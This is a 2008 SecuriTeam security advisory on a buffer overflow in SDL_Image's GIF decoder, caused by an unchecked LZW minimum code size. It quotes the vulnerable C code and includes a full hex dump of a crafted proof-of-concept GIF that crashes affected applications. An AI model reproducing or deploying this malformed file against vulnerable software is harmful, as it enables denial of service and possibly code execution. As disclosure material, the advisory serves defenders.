Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs  Black Box Testing  Vulnerability Assessment  Vulnerability Scanner SecuriTeam™ in Your Inbox   E-mail this article to a friend New vulnerability? New tool? Tell us	SDL_Image GIF Handling Buffer Overflow 23 Jan. 2008    Summary SDL_Image is "an open source library providing image file handling functionality". GIF format handling routines suffers from lack of proper buffer size validating, which makes it vulnerable to a buffer overflow attack. An attacker could DoS an application using SDL_Image, or execute arbitrary code (this has not been confirmed, and is believed to be nontrivial). Since this is a library, in some cases the attack could be remote.   Credit: The information has been provided by Gynvael Coldwind.    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * SDL_Image version 1.2.6 and prior Immune Systems:  * SDL_Image version 1.2.7 The problem takes place when a GIF file has invalid LWZ Minimum Code Size in the Table Based Image Data header. The standard allows the codes to have maximum size of 12 bits, but this is not checked in SDL_image. An attacker could use this for a local or remote buffer overflow attack that may have denial of service or arbitrary code execution effect. SDL_image file IMG_gif.c, function ReadImage: ...     unsigned char c; ...     if (LWZReadByte(src, TRUE, c) < 0) {     RWSetMsg("error reading image");     return NULL;     }     /*     ** If this is an "uninteresting picture" ignore it.      */     if (ignore) {     while (LWZReadByte(src, FALSE, c) >= 0)         ;     return NULL;     } ... Please note that 'c' value is passed to LZWReadByte without checking if it is OK with the standard. Then in function LWZReadByte: LWZReadByte(SDL_RWops *src, int flag, int input_code_size) ...     static int table[2][(1 << MAX_LWZ_BITS)]; ...     set_code_size = input_code_size; ...     clear_code = 1 << set_code_size; ...     for (i = 0; i < clear_code; ++i) {         table[0][i] = 0;         table[1][i] = i;     } ... This is the first place that is affected by this issue. Proof of concept DoS proof of concept GIF file: http://vexillium.org/dl.php?sdlgifdos 0000000 4947 3846 6139 000a 000a 00f7 0000 0000 0000010 0080 0000 0080 8080 0000 8000 0080 0080 0000020 8080 8080 c080 c0c0 00ff 0000 00ff ffff 0000030 0000 ff00 00ff 00ff ffff ffff 00ff 0000 0000040 0000 0000 0000 0000 0000 0000 0000 0000 * 0000080 0000 0000 0000 0000 0000 0033 6600 0000 0000090 0099 cc00 0000 00ff 0033 3300 0033 6633 00000a0 3300 0099 cc33 3300 00ff 0066 6600 0033 00000b0 6666 6600 0099 cc66 6600 00ff 0099 9900 00000c0 0033 6699 9900 0099 cc99 9900 00ff 00cc 00000d0 cc00 0033 66cc cc00 0099 cccc cc00 00ff 00000e0 00ff ff00 0033 66ff ff00 0099 ccff ff00 00000f0 33ff 0000 0033 3333 6600 0033 3399 cc00 0000100 0033 33ff 0033 3333 3333 6633 3333 3399 0000110 cc33 3333 33ff 0066 6633 3333 6666 6633 0000120 3399 cc66 6633 33ff 0099 9933 3333 6699 0000130 9933 3399 cc99 9933 33ff 00cc cc33 3333 0000140 66cc cc33 3399 cccc cc33 33ff 00ff ff33 0000150 3333 66ff ff33 3399 ccff ff33 66ff 0000 0000160 0066 6633 6600 0066 6699 cc00 0066 66ff 0000170 0033 3366 6633 6633 3366 6699 cc33 3366 0000180 66ff 0066 6666 6633 6666 6666 6699 cc66 0000190 6666 66ff 0099 9966 6633 6699 9966 6699 00001a0 cc99 9966 66ff 00cc cc66 6633 66cc cc66 00001b0 6699 cccc cc66 66ff 00ff ff66 6633 66ff 00001c0 ff66 6699 ccff ff66 99ff 0000 0099 9933 00001d0 6600 0099 9999 cc00 0099 99ff 0033 3399 00001e0 9933 6633 3399 9999 cc33 3399 99ff 0066 00001f0 6699 9933 6666 6699 9999 cc66 6699 99ff 0000200 0099 9999 9933 6699 9999 9999 cc99 9999 0000210 99ff 00cc cc99 9933 66cc cc99 9999 cccc 0000220 cc99 99ff 00ff ff99 9933 66ff ff99 9999 0000230 ccff ff99 ccff 0000 00cc cc33 6600 00cc 0000240 cc99 cc00 00cc ccff 0033 33cc cc33 6633 0000250 33cc cc99 cc33 33cc ccff 0066 66cc cc33 0000260 6666 66cc cc99 cc66 66cc ccff 0099 99cc 0000270 cc33 6699 99cc cc99 cc99 99cc ccff 00cc 0000280 cccc cc33 66cc cccc cc99 cccc cccc ccff 0000290 00ff ffcc cc33 66ff ffcc cc99 ccff ffcc 00002a0 ffff 0000 00ff ff33 6600 00ff ff99 cc00 00002b0 00ff ffff 0033 33ff ff33 6633 33ff ff99 00002c0 cc33 33ff ffff 0066 66ff ff33 6666 66ff 00002d0 ff99 cc66 66ff ffff 0099 99ff ff33 6699 00002e0 99ff ff99 cc99 99ff ffff 00cc ccff ff33 00002f0 66cc ccff ff99 cccc ccff ffff 00ff ffff 0000300 ff33 66ff ffff ff99 ccff ffff 21ff 04f9 0000310 0001 1000 2c00 0000 0000 000a 000a 1500 0000320 0012 ff00 481c a0b0 83c1 1308 5c2a b0c8 0000330 c261 0080 003b 0000335  Comments: Subject:  SDLimage-1.2.7, Where  Date:  12 Feb. 2008 From: jayjwahotmail.com The last version I see released is 1.2.6, which is still vuln. by this description. SDL image's home page only goes to 1.2.6.  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles WordPress MU wpmu-Blogs.php Crose Site Scrpting Vulnerability strongSwan IKEv2 Denial of Service Vulnerability Cross-Site Scripting Filter Evasion in Various Frameworks / Applications MySQL Charset Truncation Vulnerability Wordpress user_login Column SQL Truncation Vulnerability Joomla Weak Random Password Reset Token Vulnerability Linux Kernel SCTP-AUTH API Information Disclosure Vulnerability and NULL Pointer Dereferences WordPress SQL Column Truncation Vulnerability (PoC) Apache HTTP Server mod_proxy_ftp Wildcard Characters Cross-Site Scripting Dreambox DM500 Webserver Long URL Request Denial of Service Multiple Vulnerabilities in AWStats Totals vBulletin Cross Site Scripting Vulnerability (popup) Calendarix Basic Two SQL Injection Vulnerabilities Multiple Heap Overflows in Xine-Lib OpenLDAP BER Decoding Remote DoS Vulnerability  Featured Articles VMware Emulation Flaw x64 Guest Privilege Escalation WordPress MU wpmu-Blogs.php Crose Site Scrpting Vulnerability Google Docs (HTML code) Multiple Cross Site Scripting Vulnerabilities ABB PCU400 Buffer Overflow InstallShield Update Agent "Rule Script" Code Execution Vulnerability Cross-Site Scripting Filter Evasion in Various Frameworks / Applications Microsoft Windows WRITE_ANDX SMB Command Handling Kernel DoS
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2008 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®